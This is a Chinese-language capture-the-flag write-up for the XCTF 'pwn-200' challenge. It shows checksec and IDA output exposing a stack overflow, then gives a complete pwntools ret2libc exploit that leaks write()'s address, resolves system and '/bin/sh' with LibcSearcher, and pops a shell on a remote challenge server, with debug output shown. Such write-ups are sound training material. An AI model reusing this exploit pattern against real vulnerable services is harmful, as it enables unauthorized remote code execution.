XCTF-CHALLENGE-PWN-200

CTF-PWN

发布日期: 2020-09-02

文章字数: 465

阅读时长: 2 分

阅读次数:

checksec

hunter@hunter:~/PWN/XCTF/xctf_challenge$ checksec pwn-200
[*] '/home/hunter/PWN/XCTF/xctf_challenge/pwn-200'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
基操

IDA

int __cdecl main()
{
  int buf; // [esp+2Ch] [ebp-6Ch]
  int v2; // [esp+30h] [ebp-68h]
  int v3; // [esp+34h] [ebp-64h]
  int v4; // [esp+38h] [ebp-60h]
  int v5; // [esp+3Ch] [ebp-5Ch]
  int v6; // [esp+40h] [ebp-58h]
  int v7; // [esp+44h] [ebp-54h]

  buf = 'cleW';  //小端序
  v2 = ' emo';
  v3 = 'X ot';
  v4 = 'FTCD';
  v5 = '5102';
  v6 = '\n!~';
  memset(&v7, 0, 76u);
  setbuf(stdout, (char *)&buf);   //输出 提示语
  write(1, &buf, strlen((const char *)&buf));
  sub_8048484();
  return 0;
}

vulnerable：
ssize_t sub_8048484()
{
  char buf; // [esp+1Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);  //栈溢出漏洞
}

可用字符

LOAD:08048154    00000013    C    /lib/ld-linux.so.2
LOAD:08048269    0000000F    C    __gmon_start__
LOAD:08048278    0000000A    C    libc.so.6
LOAD:08048282    0000000F    C    _IO_stdin_used
LOAD:08048291    00000006    C    stdin
LOAD:08048297    00000005    C    read
LOAD:0804829C    00000007    C    stdout
LOAD:080482A3    00000007    C    setbuf
LOAD:080482AA    00000012    C    __libc_start_main
LOAD:080482BC    00000006    C    write
LOAD:080482C2    0000000A    C    GLIBC_2.0
.eh_frame:080486B3    00000005    C    ;*2$\"

没有system , /bin/sh , 后门

思路

第一次攻击
- 栈溢出控制程序流程
- 构造write函数泄露某函数真实地址
- 返回到start
第二次攻击
- 利用泄露的真实地址得到libc版本
- 获取libc地址，system，/bin/sh
- 栈溢出，构造system函数

EXP

from pwn import*
from LibcSearcher import*
context.log_level = 'debug'

elf = ELF('pwn-200')
start = 0x080483D0
write_plt = elf.plt['write']
write_got = elf.got['write']

#sh = process('./pwn-200')
sh = remote('220.249.52.133',55272)
print sh.recv()

offset = 112
payload = 'A'*offset
payload += p32(write_plt)
payload += p32(start)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)

sh.sendline(payload)
write_addr = u32(sh.recv(4))
print hex(write_addr)
print sh.recv()

libc = LibcSearcher('write',write_addr)
libc_addr = write_addr-libc.dump('write')
system_addr = libc_addr+libc.dump('system')
bin_sh_addr = libc_addr+libc.dump('str_bin_sh')

rop = 'A'*offset
rop += p32(system_addr)
rop += p32(0xdeadbeef)
rop += p32(bin_sh_addr)
sh.sendline(rop)

sh.interactive()

结果：

Welcome to XDCTF2015~!

[+] ubuntu-xenial-amd64-libc6-i386 (id libc6-i386_2.23-0ubuntu10_amd64) be choosed.
[DEBUG] Sent 0x7d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000070  40 b9 59 f7  ef be ad de  2b a0 6b f7  0a           │@·Y·│····│+·k·│·│
    0000007d
[*] Switching to interactive mode
$ ls